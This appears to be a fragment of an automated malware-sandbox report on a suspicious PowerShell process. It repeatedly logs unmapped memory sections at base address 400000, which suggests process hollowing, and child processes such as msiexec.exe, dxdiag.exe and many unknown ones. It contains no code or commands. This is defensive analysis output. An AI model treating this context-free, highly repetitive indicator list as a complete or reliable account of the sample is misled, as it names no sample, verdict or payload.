    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
